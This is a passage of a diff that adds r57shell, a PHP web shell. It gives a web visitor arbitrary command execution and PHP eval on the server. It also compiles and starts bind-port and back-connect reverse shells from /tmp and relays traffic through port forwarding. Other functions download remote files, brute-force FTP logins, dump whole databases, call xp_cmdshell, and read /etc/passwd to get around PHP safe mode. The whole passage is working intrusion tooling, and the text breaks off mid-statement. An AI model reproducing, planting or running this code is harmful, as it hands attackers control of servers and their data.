face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + @fwrite($file,$_POST['e_text']); + @fclose($file); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } + @ftp_close($connection); + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse'])) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="db_show") + { + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mysql_query("SHOW DATABASES", $db); + while(($row=@mysql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db); + while(($row2=@mysql_fetch_row($res2))) + { + echo " | - ".$row2[0]."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db); + while(($row3=@mysql_fetch_row($res3))) { echo " | - ".$row3[0]."\r\n"; } + } + } + } + } + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mssql_query("sp_databases", $db); + while(($row=@mssql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + @mssql_select_db($row[0]); + $res2 = @mssql_query("sp_tables",$db); + while(($row2=@mssql_fetch_array($res2))) + { + if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties') + { + echo " | - ".$row2['TABLE_NAME']."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mssql_query("sp_columns ".$row2[2],$db); + while(($row3=@mssql_fetch_array($res3))) { echo " | - ".$row3['COLUMN_NAME']."\r\n"; } + } + } + } + } + } + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'"); + while(($row=@pg_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){ + $sqh = "# homepage: http://rst.void.ru\r\n"; + $sqh .= "# ---------------------------------\r\n"; + $sqh .= "# date : ".date ("j F Y g:i")."\r\n"; + $sqh .= "# database : ".$_POST['mysql_db']."\r\n"; + $sqh .= "# table : ".$_POST['mysql_tbl']."\r\n"; + $sqh .= "# ---------------------------------\r\n\r\n"; + switch($_POST['db']){ + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mysql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MySQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); + $row = @mysql_fetch_row($res); + $sql1 .= $row[1]."\r\n\r\n"; + $sql1 .= "# ---------------------------------\r\n\r\n"; + $sql2 = ''; + $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); + if (@mysql_num_rows($res) > 0) { + while (($row = @mysql_fetch_assoc($res))) { + $keys = @implode("`, `", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mssql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MSSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db); + if (@mssql_num_rows($res) > 0) { + while (($row = @mssql_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $sql1 = "# PostgreSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl'].""); + if (@pg_num_rows($res) > 0) { + while (($row = @pg_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } + else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +function up_down($id) + { + global $lang; + global $language; + return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">'; + } +function div($id) + { + if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font; +echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo $te.'</div>'.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo 